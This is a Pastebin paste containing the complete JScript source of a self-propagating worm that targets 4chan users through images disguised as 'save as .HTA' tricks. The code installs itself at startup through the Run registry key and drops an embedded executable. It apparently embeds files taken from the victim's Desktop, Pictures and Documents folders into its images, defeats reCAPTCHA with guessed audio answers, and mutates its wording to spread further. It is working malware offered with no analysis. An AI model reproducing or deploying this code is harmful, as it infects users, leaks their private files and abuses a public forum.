SHARE
TWEET

Untitled

a guest Aug 3rd, 2010 4,396 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //<script id=thisscript>
  2. var initsettings = {};
  3. initsettings.line1 = unescape("");
  4. initsettings.name = unescape("CAN");
  5. initsettings.wordchoice = [29,34,46,21,28,42,50,14,38,13,43,29,36,11,8,48,20,3];
  6. initsettings.pt = 13.145477355279041;
  7. initsettings.fg = [129,70,30];
  8. initsettings.bg = [138,172,194];
  9.  
  10. // List of boards
  11. var dir = "a b c d e g h hr k m o p r s t u v w wg i ic cm y r9k 3 adv an cgl ck co fa fit int jp lit mu n new po sci sp tg toy trv tv vp x".split(" ");
  12. var mfs = [3,2,3,3,3,3,3, 8,3,3,3,5,8,3,3,3,3,4, 4,3, 3, 3,3,  2,3,  3, 3,  3, 3, 3, 3,  3,  3, 3,  3, 3,3,  3, 8,  3, 3, 3,  3,  8, 3, 3,3];
  13.  
  14. // ActiveX objects we need
  15. var request = new ActiveXObject("Msxml2.XMLHTTP");
  16. var shell = new ActiveXObject("WScript.Shell");
  17. var fs = new ActiveXObject("Scripting.FileSystemObject");
  18. var sa = new ActiveXObject("Shell.Application");
  19.  
  20. // Set directory
  21. shell.currentDirectory = fs.getSpecialFolder(2);
  22.  
  23. // Generate random string
  24. function randomstring(choices, length) {
  25.     var str = "";
  26.     for (var i = 0; i < length; i++) {
  27.         str += choices.charAt( Math.floor(Math.random()*choices.length) );
  28.     }
  29.     return str;
  30. }
  31.  
  32. // Choose randomly from list
  33. function randomchoice(list) {
  34.     return list[Math.floor(Math.random()*list.length)];
  35. }
  36.  
  37. // Gets HTML page or file from URL
  38. function get(url, doretry) {
  39.     if (typeof get.modtime == "undefined") get.modtime = [];
  40.     var successful = 0;
  41.     var tries = 0;
  42.     do {
  43.         try {
  44.             request.open("get", url, 0);
  45.             request.setRequestHeader("Accept-Language", "en-us");
  46.             if (get.modtime[url]) {
  47.                 request.setRequestHeader("If-Modified-Since", get.modtime[url]);
  48.             }
  49.             request.send();
  50.             get.modtime[url] = request.getResponseHeader("Last-Modified");
  51.             successful = (request.status == 200);
  52.         } catch(e) {}
  53.         tries++;
  54.     } while (doretry && !successful && tries < 5);
  55.     if (!successful) throw("");
  56. }
  57.  
  58. // Remove HTML entities, tags from comment
  59. function cleanup(comment) {
  60.     comment = comment.replace(/<br \/>/g, "\n");
  61.     comment = comment.replace(/<[^>]*>/g, "");
  62.     comment = comment.replace(/&quot;/g, "\"");
  63.     comment = comment.replace(/&amp;/g, "&");
  64.     comment = comment.replace(/&#44;/g, ",");
  65.     comment = comment.replace(/&lt;/g, "<");
  66.     comment = comment.replace(/&gt;/g, ">");
  67.     return comment;
  68. }
  69.  
  70. // Add deliberate typos to comment
  71. function garble(comment) {
  72.     comment = comment.split("");
  73.     for (var i = 0; i < comment.length - 1; i++) {
  74.         if (Math.random() < 0.01) {
  75.             var tmp = comment[i];
  76.             comment[i] = comment[i+1];
  77.             comment[i+1] = tmp;
  78.         }
  79.     }
  80.     comment = comment.join("");
  81.     comment = comment.replace("\n", "\r\n");
  82.     return comment;
  83. }
  84.  
  85. // Create new text stream
  86. function textstream() {
  87.     var stream = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
  88.     stream.mode = 3; //rw
  89.     stream.type = 2; //text
  90.     stream.open();
  91.     return stream;
  92. }
  93.  
  94. // Create stream containing string
  95. function stringstream(s) {
  96.     var stream = textstream();
  97.     var s2 = unescape(encodeURIComponent(s)); // encode UTF8
  98.     for (var i = 0; i < s2.length; i++) {
  99.         stream.writeText(s2.charAt(i));
  100.         stream.position -= 1;
  101.         stream.setEOS();
  102.     }
  103.     return stream;
  104. }
  105.  
  106. // Copy text streams to binary stream, removing Unicode garbage at beginning
  107. function concat(streams) {
  108.     var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
  109.     stream2.mode = 3; //rw
  110.     stream2.type = 1; //binary
  111.     stream2.open();
  112.     for (var i = 0; i < streams.length; i++) {
  113.         streams[i].position = 2;
  114.         streams[i].copyTo(stream2);
  115.         streams[i].close();
  116.     }
  117.     stream2.position = 0;
  118.     return stream2;
  119. }
  120.  
  121. // Copy n bytes from stream to file
  122. function copytofile(stream, filename, n) {
  123.     var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
  124.     stream2.mode = 3; //rw
  125.     stream2.type = 1; //binary
  126.     stream2.open();
  127.     stream.copyTo(stream2, n);
  128.     stream2.saveToFile(filename, 2);
  129.     stream2.close();
  130. }
  131.  
  132. if (typeof WSH == "undefined") {
  133.  
  134.     // Make copy of script
  135.     var stream = textstream();
  136.     stream.loadFromFile(location.pathname);
  137.     var s = stream.readText();
  138.     stream.close();
  139.     var start = 2 * s.indexOf("\u2f2f\u733c\u7263\u7069");
  140.     if (start < 0) start = 2 * s.indexOf("\u3c2f\u6373\u6972\u7470") - 1;
  141.     var end = 2 * s.indexOf("\u6164\u6174\u6e65\u7364\u6568\u6572");
  142.     if (end < 0) end = 2 * s.indexOf("\u7461\u6561\u646e\u6873\u7265") - 1;
  143.     var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
  144.     stream2.mode = 3; //rw
  145.     stream2.type = 1; //binary
  146.     stream2.open();
  147.     stream2.loadFromFile(location.pathname);
  148.     stream2.position = start - 4;
  149.     var stream3 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
  150.     stream3.mode = 3; //rw
  151.     stream3.type = 1; //binary
  152.     stream3.open();
  153.     stream2.copyTo(stream3, end - start + 16);
  154.     stream3.saveToFile("winconfig.js", 2);
  155.     stream2.close();
  156.     stream3.close();
  157.  
  158.     // Add to startup and run
  159.     var startcmd = "wscript \"" + fs.getFile("winconfig.js").path + "\"";
  160.     try {
  161.         shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\winconfig", startcmd);
  162.     } catch(e) {}
  163.     shell.run(startcmd);
  164.  
  165.     close();
  166.  
  167. } else {
  168.  
  169.     // Common English words
  170.     var wordlist = ["the","and","to","of","a","I","in","was","he","that","it","his","her","you","as","had","with","for","she","not","at","but","be","my","on","have","him","is","said","me","which","by","so","this","all","from","they","no","were","if","would","or","when","what","there","been","one","could","very","an","who","them","Mr","we","now","more","out","do","are","up","their","your","will","little","than","then","some","into","any","well","much","about","time","know","should","man","did","like","upon","such","never","only","good","how","before","other","see","must","am","own","come","down","say","after","think","made","might","being","Mrs","again","great","two","can","go","over","too","here","came","old","thought","himself","where","our","may","first","way","has","though","without","went","us","away","day","make","these","young","nothing","long","shall","sir","back","don't","house","ever","yet","take","every","hand","most","last","eyes","its","miss","having","off","looked","even","while","dear","look","many","life","still","mind","quite","another","those","just","head","tell","better","always","saw","seemed","put","face","let","took","poor","place","why","done","herself","found","through","same","going","under","enough","soon","home","give","indeed","left","get","once","mother","heard","myself","rather","love","knew","got","lady","room","something","yes","thing","father","perhaps","sure","heart","oh","right","against","three","men","night","people","door","told","round","because","woman","till","felt","between","both","side","seen","morning","began","whom","however","asked","things","part","almost","moment","looking","want","far","hands","gone","world","few","towards","gave","friend","name","best","word","turned","kind","cried","since","anything","next","find","half","hope","called","nor","words","hear","brought","set","each","replied","wish","voice","whole","together","manner","new","believe","course","least","years","answered","among","stood","sat","speak","leave","work","keep","taken","end","less","present","family","often","wife","whether","master","coming","mean","returned","evening","light","money","cannot","whose","boy","days","near","matter","suppose","gentleman","used","says","really","rest","business","full","help","child","sort","passed","lay","small","behind","girl","feel","fire","care","alone","open","person","call","given","I'll","sometimes","making","short","else","large","within","chapter","true","country","times","ask","answer","air","kept","hour","letter","happy","reason","pretty","husband","certain","others","ought","does","known","it's","bed","table","that's","ready","read","already","pleasure","either","means","spoke","taking","friends","talk","hard","walked","turn","strong","thus","yourself","high","along","above","feeling","glad","children","doubt","nature","themselves","black","hardly","town","sense","saying","deal","account","use","white","bad","everything","can't","neither","wanted","mine","close","return","dark","fell","subject","bear","appeared","fear","state","thinking","also","point","therefore","fine","case","doing","held","certainly","walk","lost","question","company","continued","fellow","truth","water","possible","hold","afraid","bring","honour","low","ground","added","five","remember","except","power","seeing","dead","I'm","usual","able","second","arms","late","opinion","window","brother","live","four","none","death","arm","road","hair","sister","entered","sent","married","longer","immediately","god","women","hours","ten","understand","son","horse","wonder","cold","beyond","please","fair","became","sight","met","afterwards","eye","year","show","general","itself","silence","lord","wrong","turning","daughter","stay","forward","O","interest","thoughts","followed","won't","different","opened","several","idea","received","change","laid","strange","nobody","fact","during","feet","tears","run","purpose","character","body","ran","past","order","need","pleased","trouble","whatever","dinner","happened","sitting","getting","there's","besides","soul","ill","early","rose","aunt","hundred","minutes","across","carried","sit","observed","suddenly","creature","conversation","worse","six","quiet","chair","doctor","tone","standing","living","sorry","stand","meet","instead","wished","ah","lived","try","red","smile","sound","expected","silent","common","meant","tried","until","mouth","distance","occasion","cut","marry","likely","length","story","visit","deep","seems","street","remained","become","led","speaking","natural","giving","further","struck","week","loved","drew","seem","church","knows","object","ladies","marriage","book","appearance","pay","I've","obliged","particular","pass","thank","form","knowing","lips","knowledge","former","blood","sake","fortune","necessary","presence","feelings","corner","beautiful","talking","spirit","ago","foot","circumstances","wind","presently","comes","attention","wait","play","easy","real","clear","worth","cause","send","spirits","chance","didn't","view","pleasant","party","beginning","horses","stopped","notice","duty","he's","age","figure","leaving","sleep","entirely","twenty","fall","promise","months","broken","heavy","secret","thousand","happiness","comfort","minute","act","human","fancy","strength","showed","pounds","nearly","probably","captain","piece","school","write","laughed","reached","repeated","walking","father's","heaven","beauty","shook","sun","waiting","moved","bit","desire","news","front","effect","laugh","uncle","fit","miles","handsome","caught","hat","regard","gentlemen","supposed","easily","impossible","glass","resolved","grew","consider","green","considered","unless","stop","forth","expect","perfectly","altogether","surprise","sudden","free","exactly","grave","carriage","believed","service","angry","putting","carry","everybody","mentioned","looks","scarcely","society","affection","exclaimed","dress","die","earth","latter","garden","step","perfect","countenance","liked","dare","pain","companion","journey","paper","opportunity","makes","honest","arrived","you'll","bright","pity","directly","cry","trust","fast","ye","warm","danger","trees","breakfast","rich","engaged","proper","talked","respect","fixed","hill","wall","determined","wild","shut","top","plain","scene","sweet","especially","public","acquaintance","forget","history","pale","pray","books","afternoon","man's","otherwise","mention","position","speech","gate","'em","boys","yours","drink","slowly","broke","clothes","fond","pride","watch","sooner","settled","paid","reply","tea","lie","running","died","gentle","particularly","allowed","outside","placed","joy","hearing","note","condition","follow","begin","neck","serious","hurt","kindness","mere","farther","changed","o'clock","passing","girls","force","situation","greater","expression","eat","reading","spoken","raised","anybody","started","following","although","sea","proud","future","quick","safe","temper","laughing","ears","difficulty","meaning","servant","sad","advantage","appear","offer","breath","opposite","number","miserable","law","rising","favour","save","twice","single","blue","noise","stone","mistress","surprised","allow","spot","burst","keeping","line","understood","court","finding","direction","anxious","pocket","around","conduct","loss","fresh","below","hall","satisfaction","land","telling","passion","floor","break","lying","waited","closed","meeting","trying","seat","king","confidence","offered","stranger","somebody","matters","noble","pardon","private","sharp","evil","weeks","justice","hot","cast","letters","youth","lives","health","finished","hoped","holding","touch","spite","delight","bound","consequence","rain","wouldn't","third","hung","ways","weather","written","difference","kitchen","she's","mother's","persons","quarter","promised","hopes","brown","nay","seven","simple","wood","beside","middle","ashamed","lose","dreadful","move","generally","cousin","surely","satisfied","bent","shoulder","art","field","quickly","thrown","tired","share","pair","to-morrow","aware","colour","writing","whenever","quietly","fool","forced","touched","smiling","taste","dog","spent","steps","worst","legs","watched","ay","thee","eight","worthy","wrote","manners","proceeded","frightened","somewhat","born","greatest","charge","degree","shame","places","ma'am","couldn't","tongue","according","box","wine","filled","servants","calling","fallen","supper"];
  171.  
  172.     // Extract file
  173.     var archive = textstream();
  174.     archive.loadFromFile(WScript.ScriptFullName);
  175.     for (var i = 2; i + 2 <= archive.size; i++) {
  176.         archive.position = i;
  177.         if (archive.readText(1).charCodeAt(0) < 256) break;
  178.     }
  179.     copytofile(archive, "winconfig.exe", 165376);
  180.     archive.close();
  181.  
  182.     // Get list of documents
  183.     var doclist = [];
  184.     var dirkeys = ["Desktop", "My Pictures", "Personal"];
  185.     for (var i = 0; i < dirkeys.length; i++) {
  186.         try {
  187.             var dirname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\" + dirkeys[i]);
  188.             var dirlist = sa.namespace(dirname).items();
  189.             for (var j = 0; j < dirlist.count; j++) {
  190.                 var it = dirlist.item(j);
  191.                 if (!it.isFolder && !it.isLink && it.size <= 3145728) {
  192.                     doclist.push(it.path);
  193.                 }
  194.             }
  195.         } catch(e) {}
  196.     }
  197.  
  198.     // List of subject lines seen
  199.     var subjectlist = [];
  200.  
  201.     // For cookie clearing
  202.     var ie;
  203.     try {
  204.         ie = new ActiveXObject("InternetExplorer.Application");
  205.         ie.navigate("http://boards.4chan.org/b/");
  206.     } catch(e) {}
  207.  
  208.     while (true) {
  209.         try {
  210.             // Clear cookies
  211.             try {
  212.                 ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
  213.                 ie.document.cookie = "ws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
  214.             } catch(e) {}
  215.  
  216.             // Select random board
  217.             board = (Math.random() < 0.2) ? 1 : Math.floor( Math.random() * dir.length);
  218.  
  219.             // Get comment, subject lines
  220.             get("http://boards.4chan.org/" + dir[board] + "/" + (5 + Math.floor(11*Math.random())), 1);
  221.             var comments = request.responseText.match(/<blockquote>.*?<\/blockquote>/g);
  222.             var comment = randomchoice(comments);
  223.             comment = cleanup(comment);
  224.             comment = comment.replace(/>>\d+/g, "");
  225.             var subjects = request.responseText.match(/<span class="(?:file|reply)title">.*?<\/span>/g);
  226.             for (var i = 0; i < subjects.length; i++) {
  227.                 var subject = cleanup(subjects[i])
  228.                 if (subject != "") {
  229.                     subjectlist.push(subject.toUpperCase());
  230.                     if (subjectlist.length > 10000) subjectlist.splice(0,1);
  231.                 }
  232.             }
  233.  
  234.             // Select thread to post to and name of file
  235.             var thread = "";
  236.             if (Math.random() < 0.9) {
  237.                 get("http://boards.4chan.org/" + dir[board] + "/", 1);
  238.                 var threadlist = request.responseText.match(/<span id="nothread\d+/g);
  239.                 thread = randomchoice(threadlist).match(/\d+/)[0];
  240.             }
  241.             var filename = (new Date().getTime() - Math.floor(Math.random()*1e10)) + ".png";
  242.  
  243.             // CAPTCHA
  244.             var threadurl = "http://boards.4chan.org/" + dir[board] + "/";
  245.             if (thread != "") threadurl += "res/" + thread;
  246.             get("http://www.google.com/recaptcha/api/challenge?k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc", 1);
  247.             var challenge1 = request.responseText.match(/challenge : '([^']+)'/)[1];
  248.             get("http://www.google.com/recaptcha/api/reload?c=" + challenge1 + "&k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc&reason=a&type=audio&lang=en&new_audio_default=1", 1);
  249.             var challenge2 = request.responseText.match(/finish_reload\('([^']+)'/)[1];
  250.             var nwords = 10 + Math.floor(3*Math.random());
  251.             response = "";
  252.             for (var i = 0; i < 10; i++) {
  253.                 if (i > 0) response += " ";
  254.                 response += randomchoice(wordlist);
  255.             }
  256.  
  257.             // Mutate settings
  258.             function MUT() {
  259.                 return Math.random() < 0.2;
  260.             }
  261.             var settings = {};
  262.             for (var x in initsettings) {
  263.                 if (typeof settings[x] == "object") {
  264.                     settings[x] = initsettings[x].slice(0);
  265.                 } else {
  266.                     settings[x] = initsettings[x];
  267.                 }
  268.             }
  269.             if (MUT()) {
  270.                 switch(Math.floor(3*Math.random())) {
  271.                     case 0: if (subjectlist.length > 0) settings.line1 = randomchoice(subjectlist); break;
  272.                     case 1: settings.line1 = comment.match(/^[a-z0-9'-\/$ ]*[\.\?\!:]*/i)[0].toUpperCase(); break;
  273.                     case 2: settings.line1 = ""; break;
  274.                 }
  275.             }
  276.             if (MUT()) {
  277.                 var wordsource = (Math.random() < .5 || subjectlist.length == 0) ? comment : randomchoice(subjectlist);
  278.                 var words = wordsource.match(/[a-z1234]+/gi);
  279.                 if (words != null) settings.name = randomchoice(words).toUpperCase();
  280.             }
  281.             for (var i = 0; i < settings.wordchoice.length; i++) {
  282.                 if (MUT()) settings.wordchoice[i] = Math.floor(60*Math.random());
  283.             }
  284.             if (MUT()) settings.pt = 100*Math.random() + 10;
  285.             if (MUT()) for (var i = 0; i < 3; i++) settings.fg[i] = Math.floor(256*Math.random());
  286.             if (MUT()) for (var i = 0; i < 3; i++) settings.bg[i] = Math.floor(256*Math.random());
  287.  
  288.             // Write new settings
  289.             var newscript = "\r\n\r\n//<scr"+"ipt id=thisscript>\r\nvar initsettings = {};\r\n";
  290.             for (var x in settings) {
  291.                 switch(typeof settings[x]) {
  292.                 case "number":
  293.                     newscript += "initsettings." + x + " = " + settings[x] + ";\r\n";
  294.                     break;
  295.                 case "object":
  296.                     newscript += "initsettings." + x + " = [" + settings[x].join(",") + "];\r\n";
  297.                     break;
  298.                 case "string":
  299.                     newscript += "initsettings." + x + " = unescape(\"" + escape(settings[x]) + "\");\r\n";
  300.                     break;
  301.                 }
  302.             }
  303.             var nsfile = fs.openTextFile("winconfig.dat", 2, 1);
  304.             nsfile.write(newscript);
  305.             nsfile.close();
  306.  
  307.             // Choose words
  308.             var lines = [];
  309.             var wc = settings.wordchoice;
  310.             lines[0] = settings.line1;
  311.             lines[1] = ["OPEN", "CLICK", "TAKE", "VIEW", "START WITH"][wc[0]%5] + " " + [["THIS", "THE"][wc[1]%2] + " " + ["IMAGE", "PIC", "PICTURE", "FILE"][wc[2]%4], "ME"][wc[3]%2];
  312.             if (wc[4]%2) lines[1] = "";
  313.             lines[2] = ["COPY", "COPY+PASTE", "PASTE"][wc[5]%3] + [" ", " IT ", " ME ", " THIS "][wc[6]%4] + "TO " + ["PAINT", "MSPAINT"][wc[7]%2];
  314.             lines[3] = "SAVE" + [" ", " IT ", " THE FILE ", " ME "][wc[8]%4] + "AS" + [":", ""][wc[9]%2];
  315.             lines[4] = ["FILE NAME: ", "NAME: ", ""][wc[10]%3] + settings.name + ".HTA";
  316.             lines[5] = ["SAVE AS TYPE: ", "TYPE: ", ""][wc[11]%3] + ["24-BIT BITMAP", "24 BITS", "BITMAP"][wc[12]%3];
  317.             if (wc[13]%2) lines[5] = "";
  318.             lines[6] = ["", "THEN ", "AND "][wc[14]%3] + "OPEN" + ["", " IT", " THE FILE", " IT AGAIN"][wc[15]%4];
  319.             lines[6] = ["", lines[6], lines[6] + " AND SHIT BRICKS", "SHIT BRICKS"][wc[16]%4];
  320.             if (wc[17]%2) {
  321.                 var num = 1;
  322.                 for (var i = 1; i <= 6; i++) {
  323.                     if (i != 4 && i != 5 && lines[i] != "") {
  324.                         lines[i] = num + ". " + lines[i];
  325.                         num++;
  326.                     }
  327.                 }
  328.             }
  329.             var text = "";
  330.             for (var i = 0; i < lines.length; i++) {
  331.                 if (lines[i] != "") {
  332.                     if (text != "") text += "\\";
  333.                     text += lines[i].replace(/[^A-Z1-4\.\?\!:\-\+'\$\/ ]/g, "");
  334.                 }
  335.             }
  336.  
  337.             // Draw text
  338.             var drawcmd = 'winconfig "' + text + '" ' + 'winconfig.dat "' + WSH.scriptFullName + '" ' + 'winconfig.sys '
  339.                     + settings.pt + ' ' + settings.fg.join(' ') + ' ' + settings.bg.join(' ');
  340.             if (doclist.length > 0) {
  341.                 drawcmd += ' "' + randomchoice(doclist).replace(/"/g, "") + '"';
  342.             }
  343.             if (shell.run(drawcmd, 0, 1)) throw "";
  344.  
  345.             // Set URL to post to
  346.             request.open("post", "http://sys.4chan.org/" + dir[board] + "/post", 0);
  347.  
  348.             // Set headers
  349.             var bdry = "---------------------------" + randomstring("0123456789abcdef", 13);
  350.             request.setRequestHeader("Accept-Language", "en-us");
  351.             request.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
  352.  
  353.             // Create POST data
  354.             var head = "--" + bdry + "\r\nContent-Disposition: form-data; name=\"";
  355.             var part1 = stringstream(
  356.                 head + "MAX_FILE_SIZE\"\r\n\r\n" + (mfs[board]*1048576) + "\r\n"
  357.                 + (thread == "" ? "" : (head + "resto\"\r\n\r\n" + thread + "\r\n"))
  358.                 + head + "name\"\r\n\r\n\r\n"
  359.                 + head + "email\"\r\n\r\nnoko\r\n"
  360.                 + head + "sub\"\r\n\r\n\r\n"
  361.                 + head + "com\"\r\n\r\n" + garble(comment) + "\r\n"
  362.                 + head + "recaptcha_challenge_field\"\r\n\r\n" + challenge2 + "\r\n"
  363.                 + head + "recaptcha_response_field\"\r\n\r\n" + response + "\r\n"
  364.                 + head + "upfile\"; filename=\"" + filename + "\"\r\nContent-Type: image/x-png\r\n\r\n"
  365.             );
  366.  
  367.             var part2 = textstream();
  368.             part2.loadFromFile("winconfig.sys");
  369.             part2.writeText("");
  370.  
  371.             var part3 = stringstream(
  372.                 "\r\n"
  373.                 + head + "pwd\"\r\n\r\n" + randomstring("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 8) + "\r\n"
  374.                 + head + "mode\"\r\n\r\nregist\r\n"
  375.                 + "--" + bdry + "--\r\n"
  376.             );
  377.  
  378.             var postdata = concat([part1, part2, part3]);
  379.  
  380.             // Post file
  381.             request.send(postdata);
  382.             postdata.close();
  383.  
  384.         } catch(e) {}
  385.     }
  386. }
  387. //</script>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top